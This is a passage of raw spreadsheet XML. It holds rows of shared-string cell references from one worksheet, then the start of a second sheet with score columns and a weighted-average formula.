      </c>
      <c r="F526" s="13" t="s">
        <v>2832</v>
      </c>
      <c r="G526" s="13" t="s">
        <v>2705</v>
      </c>
      <c r="H526" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="527" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A527" s="13" t="s">
        <v>2833</v>
      </c>
      <c r="B527" s="13" t="s">
        <v>2834</v>
      </c>
      <c r="C527" s="13" t="s">
        <v>1560</v>
      </c>
      <c r="D527" s="13" t="s">
        <v>654</v>
      </c>
      <c r="E527" s="13" t="s">
        <v>2835</v>
      </c>
      <c r="F527" s="13" t="s">
        <v>2836</v>
      </c>
      <c r="G527" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H527" s="13" t="s">
        <v>2837</v>
      </c>
    </row>
    <row r="528" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A528" s="13" t="s">
        <v>2838</v>
      </c>
      <c r="B528" s="13" t="s">
        <v>2839</v>
      </c>
      <c r="C528" s="13" t="s">
        <v>1560</v>
      </c>
      <c r="D528" s="13" t="s">
        <v>654</v>
      </c>
      <c r="E528" s="13" t="s">
        <v>2840</v>
      </c>
      <c r="F528" s="13" t="s">
        <v>2841</v>
      </c>
      <c r="G528" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H528" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="529" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A529" s="13" t="s">
        <v>2842</v>
      </c>
      <c r="B529" s="13" t="s">
        <v>2843</v>
      </c>
      <c r="C529" s="13" t="s">
        <v>16</v>
      </c>
      <c r="D529" s="13" t="s">
        <v>654</v>
      </c>
      <c r="E529" s="13" t="s">
        <v>2844</v>
      </c>
      <c r="F529" s="13" t="s">
        <v>2845</v>
      </c>
      <c r="G529" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H529" s="13" t="s">
        <v>2846</v>
      </c>
    </row>
    <row r="530" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A530" s="13" t="s">
        <v>2847</v>
      </c>
      <c r="B530" s="13" t="s">
        <v>2848</v>
      </c>
      <c r="C530" s="13" t="s">
        <v>16</v>
      </c>
      <c r="D530" s="13" t="s">
        <v>654</v>
      </c>
      <c r="E530" s="13" t="s">
        <v>2849</v>
      </c>
      <c r="F530" s="13" t="s">
        <v>2850</v>
      </c>
      <c r="G530" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H530" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="531" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A531" s="13" t="s">
        <v>2851</v>
      </c>
      <c r="B531" s="13" t="s">
        <v>2852</v>
      </c>
      <c r="C531" s="13" t="s">
        <v>16</v>
      </c>
      <c r="D531" s="13" t="s">
        <v>654</v>
      </c>
      <c r="E531" s="13" t="s">
        <v>2853</v>
      </c>
      <c r="F531" s="13" t="s">
        <v>2854</v>
      </c>
      <c r="G531" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H531" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="532" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A532" s="13" t="s">
        <v>2855</v>
      </c>
      <c r="B532" s="13" t="s">
        <v>2856</v>
      </c>
      <c r="C532" s="13" t="s">
        <v>2857</v>
      </c>
      <c r="D532" s="13" t="s">
        <v>654</v>
      </c>
      <c r="E532" s="13" t="s">
        <v>2858</v>
      </c>
      <c r="F532" s="13" t="s">
        <v>2859</v>
      </c>
      <c r="G532" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H532" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="533" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A533" s="13" t="s">
        <v>2860</v>
      </c>
      <c r="B533" s="13" t="s">
        <v>2861</v>
      </c>
      <c r="C533" s="13" t="s">
        <v>2857</v>
      </c>
      <c r="D533" s="13" t="s">
        <v>654</v>
      </c>
      <c r="E533" s="13" t="s">
        <v>2862</v>
      </c>
      <c r="F533" s="13" t="s">
        <v>2863</v>
      </c>
      <c r="G533" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H533" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="534" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A534" s="13" t="s">
        <v>2864</v>
      </c>
      <c r="B534" s="13" t="s">
        <v>2865</v>
      </c>
      <c r="C534" s="13" t="s">
        <v>2866</v>
      </c>
      <c r="D534" s="13" t="s">
        <v>654</v>
      </c>
      <c r="E534" s="13" t="s">
        <v>2867</v>
      </c>
      <c r="F534" s="13" t="s">
        <v>2868</v>
      </c>
      <c r="G534" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H534" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="535" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A535" s="13" t="s">
        <v>2869</v>
      </c>
      <c r="B535" s="13" t="s">
        <v>2870</v>
      </c>
      <c r="C535" s="13" t="s">
        <v>2871</v>
      </c>
      <c r="D535" s="13" t="s">
        <v>654</v>
      </c>
      <c r="E535" s="13" t="s">
        <v>2872</v>
      </c>
      <c r="F535" s="13" t="s">
        <v>2873</v>
      </c>
      <c r="G535" s="13" t="s">
        <v>601</v>
      </c>
      <c r="H535" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="536" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A536" s="13" t="s">
        <v>2874</v>
      </c>
      <c r="B536" s="13" t="s">
        <v>2875</v>
      </c>
      <c r="C536" s="13" t="s">
        <v>2871</v>
      </c>
      <c r="D536" s="13" t="s">
        <v>654</v>
      </c>
      <c r="E536" s="13" t="s">
        <v>2876</v>
      </c>
      <c r="F536" s="13" t="s">
        <v>2877</v>
      </c>
      <c r="G536" s="13" t="s">
        <v>601</v>
      </c>
      <c r="H536" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="537" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A537" s="13" t="s">
        <v>2878</v>
      </c>
      <c r="B537" s="13" t="s">
        <v>2879</v>
      </c>
      <c r="C537" s="13" t="s">
        <v>2871</v>
      </c>
      <c r="D537" s="13" t="s">
        <v>654</v>
      </c>
      <c r="E537" s="13" t="s">
        <v>2880</v>
      </c>
      <c r="F537" s="13" t="s">
        <v>2881</v>
      </c>
      <c r="G537" s="13" t="s">
        <v>601</v>
      </c>
      <c r="H537" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="538" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A538" s="13" t="s">
        <v>2445</v>
      </c>
      <c r="B538" s="13" t="s">
        <v>2446</v>
      </c>
      <c r="C538" s="13" t="s">
        <v>2442</v>
      </c>
      <c r="D538" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E538" s="13" t="s">
        <v>2447</v>
      </c>
      <c r="F538" s="13" t="s">
        <v>2448</v>
      </c>
      <c r="G538" s="13" t="s">
        <v>625</v>
      </c>
      <c r="H538" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="539" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A539" s="13" t="s">
        <v>2449</v>
      </c>
      <c r="B539" s="13" t="s">
        <v>2450</v>
      </c>
      <c r="C539" s="13" t="s">
        <v>2442</v>
      </c>
      <c r="D539" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E539" s="13" t="s">
        <v>2451</v>
      </c>
      <c r="F539" s="13" t="s">
        <v>2452</v>
      </c>
      <c r="G539" s="13" t="s">
        <v>625</v>
      </c>
      <c r="H539" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="540" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A540" s="13" t="s">
        <v>2453</v>
      </c>
      <c r="B540" s="13" t="s">
        <v>2454</v>
      </c>
      <c r="C540" s="13" t="s">
        <v>2455</v>
      </c>
      <c r="D540" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E540" s="13" t="s">
        <v>2456</v>
      </c>
      <c r="F540" s="13" t="s">
        <v>2457</v>
      </c>
      <c r="G540" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H540" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="541" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A541" s="13" t="s">
        <v>2458</v>
      </c>
      <c r="B541" s="13" t="s">
        <v>2459</v>
      </c>
      <c r="C541" s="13" t="s">
        <v>2460</v>
      </c>
      <c r="D541" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E541" s="13" t="s">
        <v>2461</v>
      </c>
      <c r="F541" s="13" t="s">
        <v>2462</v>
      </c>
      <c r="G541" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H541" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="542" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A542" s="13" t="s">
        <v>2463</v>
      </c>
      <c r="B542" s="13" t="s">
        <v>2464</v>
      </c>
      <c r="C542" s="13" t="s">
        <v>2465</v>
      </c>
      <c r="D542" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E542" s="13" t="s">
        <v>2882</v>
      </c>
      <c r="F542" s="13" t="s">
        <v>2467</v>
      </c>
      <c r="G542" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H542" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="543" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A543" s="13" t="s">
        <v>2468</v>
      </c>
      <c r="B543" s="13" t="s">
        <v>2469</v>
      </c>
      <c r="C543" s="13" t="s">
        <v>2460</v>
      </c>
      <c r="D543" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E543" s="13" t="s">
        <v>2470</v>
      </c>
      <c r="F543" s="13" t="s">
        <v>2471</v>
      </c>
      <c r="G543" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H543" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="544" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A544" s="13" t="s">
        <v>2472</v>
      </c>
      <c r="B544" s="13" t="s">
        <v>2473</v>
      </c>
      <c r="C544" s="13" t="s">
        <v>2474</v>
      </c>
      <c r="D544" s="13" t="s">
        <v>1338</v>
      </c>
      <c r="E544" s="13" t="s">
        <v>2475</v>
      </c>
      <c r="F544" s="13" t="s">
        <v>2476</v>
      </c>
      <c r="G544" s="13" t="s">
        <v>827</v>
      </c>
      <c r="H544" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="545" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A545" s="13" t="s">
        <v>2477</v>
      </c>
      <c r="B545" s="13" t="s">
        <v>2478</v>
      </c>
      <c r="C545" s="13" t="s">
        <v>1062</v>
      </c>
      <c r="D545" s="13" t="s">
        <v>792</v>
      </c>
      <c r="E545" s="13" t="s">
        <v>2479</v>
      </c>
      <c r="F545" s="13" t="s">
        <v>2480</v>
      </c>
      <c r="G545" s="13" t="s">
        <v>827</v>
      </c>
      <c r="H545" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="546" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A546" s="13" t="s">
        <v>2481</v>
      </c>
      <c r="B546" s="13" t="s">
        <v>2482</v>
      </c>
      <c r="C546" s="13" t="s">
        <v>631</v>
      </c>
      <c r="D546" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E546" s="13" t="s">
        <v>2483</v>
      </c>
      <c r="F546" s="13" t="s">
        <v>2484</v>
      </c>
      <c r="G546" s="13" t="s">
        <v>827</v>
      </c>
      <c r="H546" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="547" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A547" s="13" t="s">
        <v>2485</v>
      </c>
      <c r="B547" s="13" t="s">
        <v>2486</v>
      </c>
      <c r="C547" s="13" t="s">
        <v>1260</v>
      </c>
      <c r="D547" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E547" s="13" t="s">
        <v>2487</v>
      </c>
      <c r="F547" s="13" t="s">
        <v>2488</v>
      </c>
      <c r="G547" s="13" t="s">
        <v>661</v>
      </c>
      <c r="H547" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="548" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A548" s="13" t="s">
        <v>2489</v>
      </c>
      <c r="B548" s="13" t="s">
        <v>2490</v>
      </c>
      <c r="C548" s="13" t="s">
        <v>2491</v>
      </c>
      <c r="D548" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E548" s="13" t="s">
        <v>2492</v>
      </c>
      <c r="F548" s="13" t="s">
        <v>2493</v>
      </c>
      <c r="G548" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H548" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="549" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A549" s="13" t="s">
        <v>2494</v>
      </c>
      <c r="B549" s="13" t="s">
        <v>2495</v>
      </c>
      <c r="C549" s="13" t="s">
        <v>1091</v>
      </c>
      <c r="D549" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E549" s="13" t="s">
        <v>2496</v>
      </c>
      <c r="F549" s="13" t="s">
        <v>2497</v>
      </c>
      <c r="G549" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H549" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="550" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A550" s="13" t="s">
        <v>2498</v>
      </c>
      <c r="B550" s="13" t="s">
        <v>2499</v>
      </c>
      <c r="C550" s="13" t="s">
        <v>2500</v>
      </c>
      <c r="D550" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E550" s="13" t="s">
        <v>2501</v>
      </c>
      <c r="F550" s="13" t="s">
        <v>2502</v>
      </c>
      <c r="G550" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H550" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="551" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A551" s="13" t="s">
        <v>2503</v>
      </c>
      <c r="B551" s="13" t="s">
        <v>2504</v>
      </c>
      <c r="C551" s="13" t="s">
        <v>2500</v>
      </c>
      <c r="D551" s="13" t="s">
        <v>549</v>
      </c>
      <c r="E551" s="13" t="s">
        <v>2505</v>
      </c>
      <c r="F551" s="13" t="s">
        <v>2506</v>
      </c>
      <c r="G551" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H551" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="552" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A552" s="13" t="s">
        <v>2507</v>
      </c>
      <c r="B552" s="13" t="s">
        <v>2508</v>
      </c>
      <c r="C552" s="13" t="s">
        <v>2509</v>
      </c>
      <c r="D552" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E552" s="13" t="s">
        <v>2501</v>
      </c>
      <c r="F552" s="13" t="s">
        <v>2510</v>
      </c>
      <c r="G552" s="13" t="s">
        <v>538</v>
      </c>
      <c r="H552" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="553" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A553" s="13" t="s">
        <v>2511</v>
      </c>
      <c r="B553" s="13" t="s">
        <v>2512</v>
      </c>
      <c r="C553" s="13" t="s">
        <v>2513</v>
      </c>
      <c r="D553" s="13" t="s">
        <v>535</v>
      </c>
      <c r="E553" s="13" t="s">
        <v>2514</v>
      </c>
      <c r="F553" s="13" t="s">
        <v>2515</v>
      </c>
      <c r="G553" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H553" s="13" t="s">
        <v>905</v>
      </c>
    </row>
    <row r="554" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A554" s="13" t="s">
        <v>2517</v>
      </c>
      <c r="B554" s="13" t="s">
        <v>2518</v>
      </c>
      <c r="C554" s="13" t="s">
        <v>2519</v>
      </c>
      <c r="D554" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E554" s="13" t="s">
        <v>2520</v>
      </c>
      <c r="F554" s="13" t="s">
        <v>2521</v>
      </c>
      <c r="G554" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H554" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="555" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A555" s="13" t="s">
        <v>2522</v>
      </c>
      <c r="B555" s="13" t="s">
        <v>2523</v>
      </c>
      <c r="C555" s="13" t="s">
        <v>2524</v>
      </c>
      <c r="D555" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E555" s="13" t="s">
        <v>2525</v>
      </c>
      <c r="F555" s="13" t="s">
        <v>2526</v>
      </c>
      <c r="G555" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H555" s="13" t="s">
        <v>905</v>
      </c>
    </row>
    <row r="556" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A556" s="13" t="s">
        <v>2527</v>
      </c>
      <c r="B556" s="13" t="s">
        <v>2528</v>
      </c>
      <c r="C556" s="13" t="s">
        <v>791</v>
      </c>
      <c r="D556" s="13" t="s">
        <v>792</v>
      </c>
      <c r="E556" s="13" t="s">
        <v>2529</v>
      </c>
      <c r="F556" s="13" t="s">
        <v>2530</v>
      </c>
      <c r="G556" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H556" s="13" t="s">
        <v>1355</v>
      </c>
    </row>
    <row r="557" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A557" s="13" t="s">
        <v>2531</v>
      </c>
      <c r="B557" s="13" t="s">
        <v>2532</v>
      </c>
      <c r="C557" s="13" t="s">
        <v>2126</v>
      </c>
      <c r="D557" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E557" s="13" t="s">
        <v>2533</v>
      </c>
      <c r="F557" s="13" t="s">
        <v>2883</v>
      </c>
      <c r="G557" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H557" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="558" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A558" s="13" t="s">
        <v>2535</v>
      </c>
      <c r="B558" s="13" t="s">
        <v>2536</v>
      </c>
      <c r="C558" s="13" t="s">
        <v>2537</v>
      </c>
      <c r="D558" s="13" t="s">
        <v>590</v>
      </c>
      <c r="E558" s="13" t="s">
        <v>2538</v>
      </c>
      <c r="F558" s="13" t="s">
        <v>2539</v>
      </c>
      <c r="G558" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H558" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="559" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A559" s="13" t="s">
        <v>2540</v>
      </c>
      <c r="B559" s="13" t="s">
        <v>2541</v>
      </c>
      <c r="C559" s="13" t="s">
        <v>791</v>
      </c>
      <c r="D559" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E559" s="13" t="s">
        <v>2542</v>
      </c>
      <c r="F559" s="13" t="s">
        <v>2543</v>
      </c>
      <c r="G559" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H559" s="13" t="s">
        <v>1355</v>
      </c>
    </row>
    <row r="560" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A560" s="13" t="s">
        <v>2544</v>
      </c>
      <c r="B560" s="13" t="s">
        <v>2545</v>
      </c>
      <c r="C560" s="13" t="s">
        <v>791</v>
      </c>
      <c r="D560" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E560" s="13" t="s">
        <v>2546</v>
      </c>
      <c r="F560" s="13" t="s">
        <v>2547</v>
      </c>
      <c r="G560" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H560" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="561" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A561" s="13" t="s">
        <v>2548</v>
      </c>
      <c r="B561" s="13" t="s">
        <v>2549</v>
      </c>
      <c r="C561" s="13" t="s">
        <v>791</v>
      </c>
      <c r="D561" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E561" s="13" t="s">
        <v>2542</v>
      </c>
      <c r="F561" s="13" t="s">
        <v>2550</v>
      </c>
      <c r="G561" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H561" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="562" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A562" s="13" t="s">
        <v>2551</v>
      </c>
      <c r="B562" s="13" t="s">
        <v>2552</v>
      </c>
      <c r="C562" s="13" t="s">
        <v>2553</v>
      </c>
      <c r="D562" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E562" s="13" t="s">
        <v>2554</v>
      </c>
      <c r="F562" s="13" t="s">
        <v>2555</v>
      </c>
      <c r="G562" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H562" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="563" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A563" s="13" t="s">
        <v>2556</v>
      </c>
      <c r="B563" s="13" t="s">
        <v>2557</v>
      </c>
      <c r="C563" s="13" t="s">
        <v>2558</v>
      </c>
      <c r="D563" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E563" s="13" t="s">
        <v>2559</v>
      </c>
      <c r="F563" s="13" t="s">
        <v>2560</v>
      </c>
      <c r="G563" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H563" s="13" t="s">
        <v>1355</v>
      </c>
    </row>
    <row r="564" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A564" s="13" t="s">
        <v>2561</v>
      </c>
      <c r="B564" s="13" t="s">
        <v>2562</v>
      </c>
      <c r="C564" s="13" t="s">
        <v>2563</v>
      </c>
      <c r="D564" s="13" t="s">
        <v>560</v>
      </c>
      <c r="E564" s="13" t="s">
        <v>2564</v>
      </c>
      <c r="F564" s="13" t="s">
        <v>2884</v>
      </c>
      <c r="G564" s="13" t="s">
        <v>2516</v>
      </c>
      <c r="H564" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="565" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A565" s="13" t="s">
        <v>2566</v>
      </c>
      <c r="B565" s="13" t="s">
        <v>2567</v>
      </c>
      <c r="C565" s="13" t="s">
        <v>2340</v>
      </c>
      <c r="D565" s="13" t="s">
        <v>1849</v>
      </c>
      <c r="E565" s="13" t="s">
        <v>2568</v>
      </c>
      <c r="F565" s="13" t="s">
        <v>2569</v>
      </c>
      <c r="G565" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H565" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="566" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A566" s="13" t="s">
        <v>2570</v>
      </c>
      <c r="B566" s="13" t="s">
        <v>2571</v>
      </c>
      <c r="C566" s="13" t="s">
        <v>2572</v>
      </c>
      <c r="D566" s="13" t="s">
        <v>1849</v>
      </c>
      <c r="E566" s="13" t="s">
        <v>2573</v>
      </c>
      <c r="F566" s="13" t="s">
        <v>2574</v>
      </c>
      <c r="G566" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H566" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="567" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A567" s="13" t="s">
        <v>2575</v>
      </c>
      <c r="B567" s="13" t="s">
        <v>2576</v>
      </c>
      <c r="C567" s="13" t="s">
        <v>2572</v>
      </c>
      <c r="D567" s="13" t="s">
        <v>1849</v>
      </c>
      <c r="E567" s="13" t="s">
        <v>2577</v>
      </c>
      <c r="F567" s="13" t="s">
        <v>2578</v>
      </c>
      <c r="G567" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H567" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="568" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A568" s="13" t="s">
        <v>2579</v>
      </c>
      <c r="B568" s="13" t="s">
        <v>2580</v>
      </c>
      <c r="C568" s="13" t="s">
        <v>2572</v>
      </c>
      <c r="D568" s="13" t="s">
        <v>1849</v>
      </c>
      <c r="E568" s="13" t="s">
        <v>2581</v>
      </c>
      <c r="F568" s="13" t="s">
        <v>2582</v>
      </c>
      <c r="G568" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H568" s="13" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="569" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A569" s="13" t="s">
        <v>2583</v>
      </c>
      <c r="B569" s="13" t="s">
        <v>2584</v>
      </c>
      <c r="C569" s="13" t="s">
        <v>2340</v>
      </c>
      <c r="D569" s="13" t="s">
        <v>1849</v>
      </c>
      <c r="E569" s="13" t="s">
        <v>2585</v>
      </c>
      <c r="F569" s="13" t="s">
        <v>2586</v>
      </c>
      <c r="G569" s="13" t="s">
        <v>606</v>
      </c>
      <c r="H569" s="13" t="s">
        <v>539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431"/>
  <sheetViews>
    <sheetView zoomScale="130" zoomScaleNormal="130" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="B13" sqref="B13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="34.83203125" customWidth="1"/>
    <col min="2" max="2" width="105.33203125" customWidth="1"/>
    <col min="3" max="5" width="20.6640625" style="2" customWidth="1"/>
    <col min="6" max="6" width="32.5" style="1" customWidth="1"/>
    <col min="7" max="26" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="29" t="s">
        <v>2907</v>
      </c>
      <c r="B1" s="29" t="s">
        <v>2908</v>
      </c>
      <c r="C1" s="30" t="s">
        <v>2896</v>
      </c>
      <c r="D1" s="30" t="s">
        <v>2899</v>
      </c>
      <c r="E1" s="30" t="s">
        <v>2901</v>
      </c>
      <c r="F1" s="31" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A2" s="13" t="s">
        <v>2909</v>
      </c>
      <c r="B2" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C2" s="14">
        <v>0</v>
      </c>
      <c r="D2" s="14">
        <v>0</v>
      </c>
      <c r="E2" s="14">
        <v>0</v>
      </c>
      <c r="F2" s="32">
        <f t="shared" ref="F2:F33" si="0">((C2*2)+D2+(E2*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A3" s="13" t="s">
        <v>6</v>
      </c>
      <c r="B3" s="13" t="s">
        <v>2911</v>
      </c>
      <c r="C3" s="14">
        <v>0</v>
      </c>
      <c r="D3" s="14">
        <v>0</v>
      </c>
      <c r="E3" s="14">
        <v>0</v>
      </c>
      <c r="F3" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A4" s="13" t="s">
        <v>6</v>
      </c>
      <c r="B4" s="13" t="s">
        <v>2912</v>
      </c>
      <c r="C4" s="14">
        <v>0</v>
      </c>
      <c r="D4" s="14">
        <v>0</v>
      </c>
      <c r="E4" s="14">
        <v>0</v>
      </c>
      <c r="F4" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A5" s="13" t="s">
        <v>6</v>
      </c>
      <c r="B5" s="13" t="s">
        <v>2913</v>
      </c>
      <c r="C5" s="14">
        <v>0</v>
      </c>
      <c r="D5" s="14">
        <v>0</v>
      </c>
      <c r="E5" s="14">
        <v>0</v>
      </c>
      <c r="F5" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A6" s="13" t="s">
        <v>6</v>
      </c>
      <c r="B6" s="13" t="s">
        <v>2914</v>
      </c>
      <c r="C6" s="14">
        <v>5</v>
      </c>
      <c r="D6" s="14">
        <v>5</v>
      </c>
      <c r="E6" s="14">
        <v>5</v>
      </c>
      <c r="F6" s="32">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A7" s="13" t="s">
        <v>603</v>
      </c>
      <c r="B7" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C7" s="14">
        <v>0</v>
      </c>
      <c r="D7" s="14">
        <v>0</v>
      </c>
      <c r="E7" s="14">
        <v>0</v>
      </c>
      <c r="F7" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A8" s="13" t="s">
        <v>2915</v>
      </c>
      <c r="B8" s="13"/>
      <c r="C8" s="14">
        <v>0</v>
      </c>
      <c r="D8" s="14">
        <v>0</v>
      </c>
      <c r="E8" s="14">
        <v>0</v>
      </c>
      <c r="F8" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A9" s="13" t="s">
        <v>1139</v>
      </c>
      <c r="B9" s="13" t="s">
        <v>2916</v>
      </c>
      <c r="C9" s="14">
        <v>5</v>
      </c>
      <c r="D9" s="14">
        <v>5</v>
      </c>
      <c r="E9" s="14">
        <v>5</v>
      </c>
      <c r="F9" s="32">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A10" s="13" t="s">
        <v>1139</v>
      </c>
      <c r="B10" s="13" t="s">
        <v>2917</v>
      </c>
      <c r="C10" s="14">
